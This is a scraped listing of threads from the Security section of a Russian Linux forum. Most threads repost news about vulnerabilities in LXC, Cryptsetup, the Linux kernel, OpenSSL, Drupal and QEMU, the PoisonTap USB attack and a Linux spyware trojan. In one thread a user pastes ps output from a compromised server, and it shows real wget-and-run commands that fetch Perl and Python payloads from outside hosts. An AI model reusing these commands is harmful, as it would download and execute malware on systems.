rulinux.net - Форум - Security

[обскурити] поXORить файл заданным байтом

Fri, 05 Apr 2019 13:10:09 +0300

Субж. Как? bash, консольные утилиты. Наверняка уже всё это реализовано.

С чего начать тестировщику для погружения в область ИБ (сети) ?

Sun, 15 Jan 2017 10:59:30 +0300

Понятно, что полно курсов, книг, ресурсов, блогов и т.д.
Просто как раз от изобилия всего трудно определиться и начать.
Например:
есть курсеровские курсы, как-то:
https://www.coursera.org/specializations/cyber-security
https://www.coursera.org/specializations/cybersecurity-developing-program-for-business
ну и там еще есть...
Еще есть уйма книг по Kali Linux для пентестинга.
Есть еще, например, https://www.apress.com/us/book/9781590594445 для защиты и укрепления.
Короче главный вопрос, пожалуй, будет звучать так:
С чего начать с защиты и укрепления или с пентестинга и потом уже смотря по найденным уязвимоястям строить оборону?
Понятно, что нужно отталкиваться от задачи. Ну вот, например, я хочу заняться защитой собственной домашней сети. С чего начать?

Уязвимость в LXC, позволяющая получить доступ к файлам вне контейнера

Sun, 27 Nov 2016 11:19:40 +0300

В инструментарии управления изолированными контейнерами LXC выявлена уязвимость (CVE-2016-8649), позволяющая при наличии прав root внутри непривилегированного контейнера (работающего в отдельном user namespace) получить доступ к файлам хост-системы и выполнить свой код вне изолированного окружения.

Атака может быть совершена при запуске в контейнере процессов при помощи утилиты lxc-attach. Пользователь root в контейнере имеет возможность влиять на работу утилиты lxc-attach, что, в сочетании с достаточно просто достигаемым состоянием гонки при выполнении lxc-attach, может привести к отключению ограничений и получению доступа к хост-системе. Уязвимость охватывает две проблемы: использование в lxc-attach данных из источников, подконтрольных пользователю контейнера, и возможность применения вызова ptrace для экземпляров lxc-attach, созданных в другом пространстве пользователей (root из контейнера может получить доступ к процессу, созданному во внешнем user namespace).

В частности, lxc-attach оставляет открытым файловый дескриптор к одному из файлов /proc на стороне хост-системы, что позволяет атакующему получить чего него доступ к остальным частям файловой системы, используя системные вызовы семейства openat(). В том числе через файловый дескриптор могут быть записаны данные в файлы /proc/PID/attr/current или /proc/PID/attr/exec на стороне хост-системы для установки меток AppArmor и SELinux к прикреплённому процессу, что даёт возможность отключить сброс привилегий для процесса, запускаемого при помощи lxc-attach.
Уязвимость уже устранена в Ubuntu Linux и ожидает исправления в Debian, RHEL/CentOS, Fedora, Fedora EPEL и SUSE/openSUSE. Патч для блокирования уязвимости принят в дерево исходных текстов LXC, но для полного устранения возможных альтернативных векторов атаки также требуется внесение исправлений в ядро Linux для реализации проверки прав доступа к ptrace с учётом user namespace.
http://openwall.com/lists/oss-security/2016/11/23/6
http://www.opennet.ru/opennews/art.shtml?num=45573

Атака на заблокированный ПК через USB

Thu, 17 Nov 2016 12:05:03 +0300

Сами Камкар (Samy Kamkar), исследователь безопасности, известный созданием различных замысловатых устройств для проведения атак, таких как кейлоггер в USB-зарядке телефона, представил свою новую разработку - PoisonTap. В рамках проекта PoisonTap подготовлена практическая реализация атаки BadUSB, позволяющая получить доступ к прокэшированным в браузере сессионным cookie и параметрам аутентификации через подключение к USB-порту компьютера специального устройства. Атака применима к заблокированным компьютерам, независимо от используемых ОС, и может быть совершена когда владелец на время отлучился от своего ПК, оставив его с заблокированным экраном без присмотра.

Для атаки используется самый дешёвый одноплатный компьютер Raspberry Pi Zero, продаваемый за $5. На устройство загружен дистрибутив Linux, настроенный для эмуляции сетевого адаптера по USB, по DHCP объявляющий себя в качестве шлюза для локальной подсети 128.0.0.0. При подключении такого устройства к USB-порту, компьютер жертвы воспринимает его как новую сетевую плату, через которую доступен шлюз для обращения к локальной сети, охватывающей половину адресного пространства (устройство представляется как 1.0.0.1 с сетевой маской 128.0.0.0). Новый сетевой интерфейс менее приоритетен на компьютере жертвы, но так как подсеть задана явно, то подпадающий под эту подсеть трафик уходит через новый сетевой интерфейс независимо от наличия шлюза по умолчанию на более приоритетном интерфейсе.

На устройстве запускается подставной DNS-сервер, выдающий фиктивные ответы для запросов имён хостов, что позволяет переадресовать к PoisonTap все запросы и сохранить в кэше привязку доменов к сторонним адресам, в том числе организовать доступ к внутренним хостам локальной сети при помощи техники DNS rebinding.

Для сбора данных на устройстве PoisonTap запускается специальное приложение с реализацией простого http-сервера, который перехватывает все незашифрованные запросы по HTTP с компьютера жертвы. Если на компьютере пользователя остаётся открытым web-браузер, то с большой долей вероятности некоторые страницы периодически обращаются во вне, например, для обновления рекламных блоков, статистики, AJAX-вставок и т.п. Перехватив такое обращение программа атакущего обрабатывает его и генерирует ответ, в зависимости от запроса содержащий специально оформленный HTML или JavaScript.

Через подстановку скрытых блоков iframe организуется обращение к списку популярных сайтов из web-браузера жертвы (используется список из миллиона сайтов от рейтинга Alexa). Если пользователь ранее открывал участвующий в переборе сайт и у него прокэшированы параметры сеанса, то браузер вместе с запросом отправит имеющиеся cookie, а так как трафик контролируется на устройстве атакующего, незашифрованные cookie будут перехвачены. В том числе перехватываются cookie для сайтов, ранее открытых по HTTPS, если данные cookie были установлены без флага Secure, т.е. отправляются и для HTTPS и для HTTP.

Кроме того, в перехваченном трафике выявляются и подменяются популярные JavaScript-библиотеки, запрашиваемые через типовые сети доставки контента. Подменённые библиотеки, например JQuery, могут применяться для продолжения атаки после отсоединения USB-устройства. Так как подменённые JavaScript-библиотеки оседают в кэше, то в дальнейшем, при открытии пользователем страниц, запрашивающих данные JavaScript-библиотеки, будет выдан вариант из кэша, в который в процессе атаки был встроен код атакующего. Данным способом можно обеспечить перехват сессионных Cookie для будущих входов на сайты, к которым в данный момент не имеется активных сеансов.

В процессе атаки также может быть запущен JavaScript-код, выполняющий функции бэкдора. При помощи WebSocket скрипт устанавливает соединение с внешним сервером атакующего (не с PoisonTap, а с реальным внешним хостом) и поддерживает данное соединение в активном состоянии. Пока соединение активно, атакующий может со стороны внешнего сервера в любое время передать команду скрипту и выполнить подстановку iframe или запустить код на JavaScript в контексте текущего сайта.

Сурс новости на опеннете

Презентация на ютубе

Уязвимость в Cryptsetup, позволяющая получить доступ к root shell

Tue, 15 Nov 2016 13:21:04 +0300

В пакете Cryptsetup, применяемом для шифрования дисковых разделов в Linux, выявлена уязвимость (CVE-2016-4484), позволяющая получить доступ в командную оболочку начального загрузочного окружения initramfs или Dracut с правами пользователя root. Проблема вызвана ошибкой в коде скрипта разблокировки и проявляется только при использовании шифрования LUKS (Linux Unified Key Setup) на системных разделах.

Для эксплуатации уязвимости достаточно нажать и удерживать клавишу Enter в ответ на запрос ввода пароля для доступа к зашифрованным разделам. После примерно 70 секунд удерживания Enter пользователь будет выброшен в root shell загрузочного окружения. Атака хорошо повторяема и не зависит от настроек или системного окружения. Для атаки требуется физический доступ к системе, но не исключаются и варианты удалённой эксплуатации облачных окружений. Из систем для которых уязвимость предоставляет угрозу также упоминаются автоматизированные рабочие места, пункты совместного доступа к интернет, интернет-киоски, справочные автоматы и другие публично досутпные устройства с клавиатурой.

Несмотря на то, что полный доступ предоставляется только в окружение начальной загрузки initramfs или Dracut, атакующий имеет возможность скопировать, изменить или вывести из строя содержимое незашифрованных дисков (зашифрованные разделы остаются недоступны). Например, обычно без шифрования оставляется раздел /boot, что позволяет подменить загрузочные файлы или оставить исполняемый файл с правами SetUID root для повышения привилегий локального пользователя. Также можно настроить сетевое соединение и скопировать зашифрованный раздел для осуществления подбора пароля.

Проблема вызвана неверной обработкой превышения лимита на максимальное число попыток монтирования - вместо предложения выполнить перезагрузку, осуществлялся выход из скрипта проверки c кодом ошибки, что приводило к продолжению попыток смонтировать раздел и выводу консоли восстановления (root shell) после превышения лимита на число неудачных попыток. В настоящее время обновления для пакета Cryptsetup в дистрибутивах пока не выпущены (Debian, RHEL, Ubuntu, Fedora, CentOS, SUSE, openSUSE). В качестве временной меры защиты можно настроить в grub загрузку ядра с параметром "panic" (в GRUB_CMDLINE_LINUX_DEFAULT добавить "panic=5" и запустить grub-install), после чего загрузочный скрипт инициирует перезагрузку вместо вывода root shell.

opennet

Выявлено троянское ПО для Linux c функциями сохранения скриншотов и записи звука

Thu, 21 Jan 2016 11:59:18 +0300

Компания "Доктор Веб" сообщила о выявлении вредоносного ПО Linux.Ekoms.1, осуществляющего слежку за пользователями настольных систем на базе ядра Linux. В частности, Linux.Ekoms.1 пытается захватить конфиденциальную информацию или данные, которые можно использовать для шантажа, путём создания скриншотов каждые 30 секунд с их последующей отправкой на сервер злоумышленников.

Кроме того, Linux.Ekoms.1 поддерживает функциональность удалённого выполнения команд и загрузки на внешний сервер произвольных локальных файлов. В состав вредоносного ПО также входит код для скрытой записи звука, но данная возможность отключена по умолчанию. Взаимодействие с сервером производится с использованием шифрованного канала связи (AES, с шифрованием ключа AES при помощи открытого ключа на основе асимметричного алгоритма RSA).

После первого запуска в системе жертвы вредоносное ПО размещается под видом файлов $HOME/$DATA/.mozilla/firefox/profiled или HOME/$DATA/.dropbox/DropboxCache и отправляет сведения о новой поражённой системе на внешний сервер. Для автоматического запуска в системе вредоносное ПО создаёт файл $HOME/.config/autostart/%exename%.desktop. Так как Linux.Ekoms.1 нацелен в основном на поражение рабочих станций, размещение в системе, как правило, происходит в результате беспечного поведения пользователя, запустившего неизвестный исполняемый файл, установившего непроверенный пакет или использующего для открытия сомнительных сайтов необновлённый выпуск браузера.

Подробнее по ссылке на опеннет

В ядре Linux обнаружена уязвимость, позволяющая поднять привилегии в системе

Wed, 20 Jan 2016 14:30:30 +0300

Все версии ядра Linux, начиная с 3.8 и заканчивая веткой 4.5 в git, подвержены уязвимости (CVE-2016-0728), позволяющей локальному непривилегированному пользователю получить права суперпользователя.

Ошибка в коде существует с 2012 года - ей подвержены как минимум 2/3 пользователей ОС Android, которые находятся в зоне повышенного риска, так как Google не может проверить исполняемый код, собранных с использованием NDK (Native Development Kit) мобильных приложений и игр, опубликованных в Google Play. Обычные компьютеры и серверы находятся в относительной безопасности в случае, если в системе только один пользователь, пользователям запрещено исполнять код или экземпляры ОС находятся в среде виртуализации.

Уязвимость присутствует в подсистеме ядра keyrings, отвечающей за кэширование и хранение ключей аутентификации и сертификатов для шифрования. Ошибка вызвана некорректным освобождением объектов, что может привести к обращению к уже освобождённой области памяти (use-after-free) в ситуации, когда процесс пытается заменить свой текущий сессионный keyring тем же самым экземпляром. Эксплуатация уязвимости достаточно тривиальна - код эксплоита составляет всего 100 строк на языке C (эксплоит выполняется около 30 минут, так как выполняет более 4 миллиардов системных вызовов).

Подробнее по ссылке на опеннет

В OpenSSL обнаружили 8 новых уязыимостей

Sat, 10 Jan 2015 07:37:39 +0300

Если есть возможность, рекомендуется обновиться, хотя баги и не критичные.

Server administrators are advised to upgrade OpenSSL again to fix eight new vulnerabilities, two of which can lead to denial-of-service (DoS) attacks. Although the flaws are only of moderate and low severity, "system administrators should plan to upgrade their running OpenSSL server instances in the coming days," said Tod Beardsley, engineering manager at vulnerability intelligence firm Rapid7.

Two denial-of-service vulnerabilities, tracked as CVE-2014-3571 and CVE-2015-0206, only affect OpenSSL’s implementation of the DTLS (Datagram Transport Layer Security) protocol, which is not as widely used as the TLS (Transport Layer Security) protocol.

http://www.itworld.com/article/2867375/openssl-patches-eight-new-vulnerabilities.html

[Решето] В ядре Linux выявлена уязвимость, которая может привести к локальному повышению привилегий

Tue, 16 Dec 2014 08:20:36 +0300

Во всех актуальных версиях ядра Linux найдена уязвимость (CVE-2014-9322), которая позволяет локальному злоумышленнику повысить свои привилегии в системе. Проблема проявляется только на архитектуре x86_64. Уязвимость выявлена в результате анализа найденной в конце ноября проблемы CVE-2014-9090 и решается ранее представленным для CVE-2014-9090 патчем.

Таким образом, выпущенные на прошлой неделе обновления пакетов с ядром для Ubuntu и Fedora закрывают и новую уязвимость (для RHEL/CentOS обновление от 9 декабря не содержит исправления проблемы). Если проблема CVE-2014-9090 не закрыта, появляется новый вектор атаки, который может привести не только к краху ядра (CVE-2014-9090 имеет статус DoS-уязвимости), но и выполнению кода с повышенными привилегиями. Для систем в которых не включены механизмы защиты SMAP (Supervisor Mode Access Prevention) и UDEREF отмечается высокая вероятность лёгкой эсплуатации уязвимости.

В настоящее время уже подготовлен тестовый эксплоит (sigreturn), который можно использовать для проверки своих систем на наличие уязвимости. Одновременно сообщается о наличии ещё двух менее опасных уязвимостях в ядре Linux - CVE-2014-8133 и CVE-2014-8134, которые могут привести к утечке 2-4 байт из стека ядра. Оценить появление обновлений можно на следующих страницах: openSUSE, SLES, Slackware, Gentoo, CentOS, Debian, RHEL 6, RHEL 7 (в Ubuntu и Fedora уязвимость CVE-2014-9090 устранена).

http://www.opennet.ru/opennews/art.shtml?num=41276

я кажись вирус на перле и питоне нашел на одной машинке-сервере

Sat, 08 Nov 2014 14:51:33 +0300

выглядит так

text

kuvshin@www:~$ ps auxww | grep perl

root      1394  0.0  0.0  11616   292 ?        Ss   Nov03   0:00 /usr/local/Apache/bin/httpd-perl

www_user 13919  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1

www_user 13922  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1

www_user 13926  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1

www_user 13930  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1

www_user 13936  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1

www_user 13947  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl .smtp

www_user 13950  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp

www_user 13951  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp

www_user 13954  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp

www_user 13965  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl .smtp

www_user 14627  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1

www_user 14630  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1

www_user 14634  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1

www_user 14637  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1

www_user 14641  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1

www_user 14650  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp

www_user 14653  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl .smtp

www_user 14656  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl .smtp

www_user 14663  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl .smtp

www_user 14676  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp

www_user 16548  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1

www_user 16550  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1

www_user 16555  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1

www_user 16559  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1

www_user 16562  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl /tmp/.smtp2

www_user 16568  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl /tmp/.smtp2

www_user 16572  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl /tmp/.smtp2

www_user 16582  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1

www_user 16585  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl /tmp/.smtp2

www_user 16593  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl /tmp/.smtp2

www_user 17981  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1

www_user 17985  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1

www_user 17988  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1

www_user 17992  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1

www_user 17996  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1

www_user 18004  0.0  0.0   4104   880 ?        S    Nov06   0:00 perl /tmp/.rnd

www_user 18008  0.0  0.1   4104  2012 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18012  0.0  0.1   4104  2028 ?        S    Nov06   0:05 perl /tmp/.rnd

www_user 18017  0.0  0.2   4100  2124 ?        S    Nov06   0:03 perl /tmp/.rnd

www_user 18021  0.0  0.1   4100  1976 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18098  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18099  6.7  0.1   3976  1948 ?        R    Nov06 221:36 perl /tmp/.rnd

www_user 18102  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18105  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18106  0.0  0.0   4100   880 ?        S    Nov06   0:00 perl /tmp/.rnd

www_user 18109  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18110  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18113  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18114  0.0  0.1   4104  2024 ?        S    Nov06   0:27 perl /tmp/.rnd

www_user 18119  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18120  0.0  0.1   4104  2040 ?        S    Nov06   0:13 perl /tmp/.rnd

www_user 18123  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18124  0.0  0.1   4104  2000 ?        S    Nov06   0:05 perl /tmp/.rnd

www_user 18127  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18128  0.0  0.1   4100  2012 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18133  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18134  0.0  0.0   4100   880 ?        S    Nov06   0:03 perl /tmp/.rnd

www_user 18135  0.0  0.1   4104  2016 ?        S    Nov06   0:18 perl /tmp/.rnd

www_user 18138  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18139  0.0  0.1   4100  1992 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18142  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18143  0.0  0.1   4100  2000 ?        S    Nov06   0:00 perl /tmp/.rnd

www_user 18146  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18147  0.0  0.1   4104  1988 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18150  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18151  6.7  0.1   3976  1936 ?        R    Nov06 219:47 perl /tmp/.rnd

www_user 18154  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18157  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18158  0.0  0.0   4104   880 ?        S    Nov06   0:00 perl /tmp/.rnd

www_user 18160  0.0  0.1   4104  2016 ?        S    Nov06   0:08 perl /tmp/.rnd

www_user 18199  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18202  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18203  0.0  0.1   4108  2016 ?        R    Nov06   0:03 perl /tmp/.rnd

www_user 18207  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18210  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18212  6.7  0.1   3976  1912 ?        R    Nov06 219:02 perl /tmp/.rnd

www_user 18213  0.0  0.1   4100  2008 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user 18214  0.0  0.1   4100  2024 ?        S    Nov06   0:04 perl /tmp/.rnd

www_user 18217  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1

www_user 18218  0.0  0.1   4100  1992 ?        S    Nov06   0:01 perl /tmp/.rnd

www_user  1702  0.0  0.0   5744   384 ?        S    Nov06   0:00 python pyt 181.59.60.227 wget http://yourschool.net/.tmp/frogclog.php?SMTP=181.59.60.227;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user  5835  0.0  0.0   5744   384 ?        S    Nov06   0:00 python pyt 31.30.12.75 wget http://yourschool.net/.tmp/frogclog.php?SMTP=31.30.12.75;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user  1851  0.0  0.0   5768   384 ?        S    Nov06   0:00 python pyt 59.86.194.104 wget http://yourschool.net/.tmp/frogclog.php?SMTP=59.86.194.104;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 22400  0.0  0.0   5764   384 ?        S    Nov06   0:00 python pyt 93.192.222.59 wget http://yourschool.net/.tmp/frogclog.php?SMTP=93.192.222.59;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 14323  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 14503  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 14539  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 14562  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 14667  0.0  0.0   5744   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user  5673  0.0  0.0   5768   384 ?        S    Nov07   0:00 python pyt 223.202.59.75 wget http://yourschool.net/.tmp/frogclog.php?SMTP=223.202.59.75;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

www_user 17668  0.1  1.8  23544 19284 ?        R    17:51   0:03 /usr/local/Apache/bin/httpd-perl

www_user 18103  0.1  1.8  22928 18620 ?        S    17:54   0:03 /usr/local/Apache/bin/httpd-perl

www_user 18131  0.1  1.8  23288 18884 ?        S    17:54   0:03 /usr/local/Apache/bin/httpd-perl

www_user 18165  0.1  3.6  41552 37216 ?        S    17:54   0:03 /usr/local/Apache/bin/httpd-perl

www_user 18246  0.1  2.3  28216 23932 ?        S    17:55   0:02 /usr/local/Apache/bin/httpd-perl

www_user 18254  0.1  2.9  35460 31000 ?        S    17:55   0:03 /usr/local/Apache/bin/httpd-perl

www_user 18255  0.1  2.0  25128 20812 ?        S    17:55   0:02 /usr/local/Apache/bin/httpd-perl

www_user 18267  0.1  1.8  23452 19152 ?        S    17:55   0:03 /usr/local/Apache/bin/httpd-perl

www_user 22528  0.0  0.2   4220  2756 ?        R    18:26   0:00 /usr/bin/perl -w /usr/local/etc/httpd/pereplet/cgi-bin/news.cgi

kuvshin  22530  0.0  0.0   1772   624 pts/0    S+   18:26   0:00 grep perl

Все сайты на базе Drupal 7, сразу не установившие обновление 7.32, следует считать взломанными

Thu, 30 Oct 2014 18:04:29 +0300

История с выявлением критической уязвимости (CVE-2014-3704) в системе управления web-контентом Drupal получила неожиданное продолжение. Разработчики Drupal опубликовали экстренное заявление, в котором объявили, что все системы на основе Drupal 7, которые в течение семи часов не успели обновить до версии 7.32, следует считать скомпрометированными. 15 октября в 11 часов (GMT) зафиксировано начало автоматизированной массовой атаки на сайты, в результате которой была развёрнута кампания по скрытой установке бэкдоров.

Обновление уже атакованных систем до версии 7.32 не решает проблемы, бэкдор останется активен. Более того, после внедрения бэкдора в некоторых случаях атакующими производилось применение патча, закрывающего уязвимость для блокирования повторных атак на систему. Иными словами, если на сайте уже закрыта уязвимость, но администратор не применял патчи, то это является одним из индикаторов компрометации. Более того, некоторые виды атак невозможно отследить, так как они не были связаны с изменением кода, а лишь привели к выгрузке содержимого БД, включая базу пользователей. Кроме того, зафиксировано применение различных способов внедрения бэкдора - от изменения содержимого БД до правки PHP-кода, размещения новых PHP-файлов и проведения атак на смежные web-сервисы.

Так как нельзя полностью быть уверенным в отсутствии атаки, пользователям Drupal, которые сразу не установили обновление, рекомендуется изменить пароли и восстановить содержимое своих сайтов из резервной копии, созданной до 15 октября, или провести детальный аудит всех изменений. При этом нельзя исключить, что атакующие могли воспользоваться другими уязвимостями для повышения своих привилегий в системе и их деятельность может не ограничиться атакой на Drupal.

http://www.opennet.ru/opennews/art.shtml?num=40965

Позволю себе процитировать местных завсегдатыих "Ололо дисскас"

[Решето]QEMU побег и выполнение кода с правами сервиса.

Sat, 19 Apr 2014 17:44:24 +0400

Michael S. Tsirkin of Red Hat discovered a buffer overflow flaw in the way qemu processed MAC addresses table update requests from the guest.

A privileged guest user could use this flaw to corrupt qemu process memory on the host, which could potentially result in arbitrary code execution on the host with the privileges of the qemu process.

